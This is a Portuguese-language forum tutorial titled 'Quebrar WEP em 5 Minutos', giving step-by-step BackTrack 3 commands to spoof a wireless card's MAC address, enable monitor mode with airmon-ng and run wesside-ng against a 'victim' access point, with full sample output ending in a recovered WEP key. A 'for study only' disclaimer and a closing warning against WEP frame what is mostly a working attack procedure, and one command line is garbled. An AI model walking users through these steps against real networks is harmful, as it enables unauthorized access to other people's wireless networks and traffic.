Quebrar WEP em 5 Minutos!!!

 

 


Estou aqui novamente para compartilhar com você alguns dos meus poucos conhecimentos!
O assunto deste tutorial é como quebrar uma chave de WEP em menos de 5 minutos
(depende do trafico da rede, quanto mais clientes conectados mais rápido ocorre o processo)

Este modo e quase todo automático, e sem complicações

Primeiro agradeço a o Thinker que foi quem me deu as dicas sobre este processo!

Dedico este tutorial a o amigo <dR.r4Vn0s> ! Cara gente fina e que manda super bem em redes!

Ai pessoal a única coisa que eu peço para vocês é que comentem ai! E muito ruim quando agente posta alguma coisa e ninguém comenta! Mesmo que seja para criticar o post! Mas comentem!
Valeu


Não me responsabilizo pelo mau uso deste tutorial, ele é apenas para estudo!

Bom vamos La!



(neste tutorial esta sendo usada uma placa wifi com chipset Atheros)

(os códigos abaixo são da autoria do Thinker e foram editados por mim, todo credito a ele)

Bom nos vamos usar live cd do BackTrack 3, que tem para download aqui no fórum mesmo!

Baixe a .ISO do BackTrack 3 grave num cd, reinicie o PC , de boot pelo cd do BackTrack 3, e espere carregar !

Quando abrir o BackTrack 3 abra uma janela do Shell e digite os seguintes comandos:

digite


 
ifconfig

aparecera:

 
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)

depois digite:

 
ifconfig ath0 hw ether 00:11:22:33:44:55
ifconfig ath0 up
ifconfig

Caso tenha digitado tudo certo, aparecerá algo assim:

 
bt ~ # ifconfig
ath0 Link encap:Ethernet HWaddr 00:11:22:33:44:55
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
wifi0 Link encap:UNSPEC HWaddr 00-19-5B-8E-4D-CC-00-00-00-00-00-00-00-00-00-00
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:659 errors:0 dropped:0 overruns:0 frame:16
TX packets:127 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:199
RX bytes:58622 (57.2 KiB) TX bytes:5722 (5.5 KiB)
Interrupt:19

Com estes comandos acima trocamos o Mac da sua placa de rede
Agora vamos colocar nossa placa de rede em modo monitor:
Digite:


 
airmon-ng stop ath0

Ai aparecera:


 
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)

Depois digite:
 
airmon-ng start wifi0

E aparecera:
 
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

Se ocorrer tudo certinho sua placa já estará em modo monitor
Agora vamos usar o wesside-ng, digite o seguinte comando:

 
wesside-ng -i ath0 Wesside-ng-i ath0


Pronto, agora o programa se encarrega do resto sozinho, seu resultado vai dar mais ou menos esse aqui:

 
[02:40:15] Using mac 00:11:22:33:44:55
[02:40:15] Looking for a victim...
[02:40:15] Found SSID(APxxx) BSS=(xx:xx:xx:xx:xx:xx) chan=10
[02:40:15] Authenticated
[02:40:15] Associated (ID=2)

[02:40:15] WARNING: Got NON wep packet from xx:xx:6F:51:xx:xx dlen -6
[02:40:15] WARNING: Got NON wep packet from xx:xx:6F:51:xx:xx dlen -6
[02:40:15] WARNING: Got NON wep packet from xx:xx:6F:51:xx:xx dlen -6
[02:40:15] WARNING: Got NON wep packet from xx:xx:6F:51:xx:xx dlen -6
[02:40:15] WARNING: Got NON wep packet from xx:xx:6F:51:xx:xx dlen -6
[02:40:15] WARNING: Got NON wep packet from xx:xx:6F:51:xx:xx dlen -6
[02:40:15] WARNING: Got NON wep packet from xx:xx:6F:51:xx:xx dlen -6
[02:40:15] WARNING: Got NON wep packet from xx:xx:6F:51:xx:xx dlen -6
[02:40:15] WARNING: Got NON wep packet from xx:xx:6F:51:xx:xx dlen -6
[02:40:15] WARNING: Got NON wep packet from xx:xx:6F:51:xx:xx dlen -6
[02:40:21] Datalen 46 Known clear 8
[02:40:21] Got 8 bytes of prga IV=(48:28:00) PRGA=20 36 02 90 3E A5 ED 16
[02:40:21] Got 36 bytes of prga IV=(3b:2a:dd) PRGA=A1 43 5D 33 E9 2F F1 64 A1 E4 E1 D7 69 A1 01 7D 9A 50 1C EE 23 82 9D C6 4E 06 56 6A 03 6A 1D 10 CF 36 08 E9
[02:40:21] Got 144 bytes of prga IV=(dd:f5:17) PRGA=52 19 C6 34 B4 6B 8B D0 68 D4 82 32 07 04 AA 9B 58 0E 26 4A C7 39 87 0F 23 68 9F 45 E8 5E A7 AE 8A A7 F2 7A 50 C2 94 C5 19 41 FB FD 65 A7 77 74 9E F7 FF 6F 3D 58 AD 01 D9 D2 7F 86 70 0B 6F 43 52 CC 92 E8 BD 10 06 8C 8F 60 82 10 E3 9B A1 8D 61 7C 64 96 FE 7C 07 BB 3D 00 D9 96 C6 3C 5B B9 5C 43 6F 98 5C 54 46 16 A1 B3 A8 EC 3E EA 4A 02 75 3C B9 C8 A8 F5 AB 3D B3 EE D0 4F 40 89 B7 4E 78 CB 68 D1 17 94 A3 87 DA 70 25 CE 4E 18 EA D2
[02:40:32] Got ARP request from (xx:xx:xx:xx:xx:xx)
[02:40:32] Guessing PRGA d8 (IP byte=249)
[02:40:32] Got clear-text byte: 192
[02:40:33] Guessing PRGA 7b (IP byte=69)
[02:40:33] Got clear-text byte: 168
[02:40:34] Guessing PRGA aa (IP byte=109)
[02:40:34] Got clear-text byte: 0
[02:40:34] Guessing PRGA 57 (IP byte=73)
[02:40:34] Got clear-text byte: 110
[02:40:34] Got IP=(192.168.0.110)
[02:40:34] My IP=(192.168.0.123)
[02:40:34] Sending arp request for: 192.168.0.110
[02:40:34] Got arp reply from (xx:xx:xx:xx:xx:xx)
[02:41:04] WEP=000010013 (next crack at 10000) IV=2f:43:a6 (rate=171)
[02:41:04] Starting crack PID=8930
hit with strongbyte for keybyte 2ack at 20000) IV=33:81:69 (rate=307)

Key: 11:74:87:93:29


[02:41:13] KEY=(11:74:87:93:29)
Owned in 0.97 minutes

[02:41:13] Dying...

[02:41:13] Stopping crack PID=8930


[02:41:13] KEY=(11:74:87:93:29)
Owned in 0.97 minutes

[02:41:13] Dying...


Pronto achou a chave de wep!!! Que neste exemplo é 11:74:87:93:29, tudo isso em 97 segundos!


Por estes motivos que não aconselho mais ninguem a usar segurança WEP, ela ja não representa segurança nenhuma para seu provedor!
 

 

Tópico: Quebrar WEP em 5 Minutos!!!

Nenhum comentário foi encontrado.

Pesquisar no site

© 2012 Todos os direitos reservados.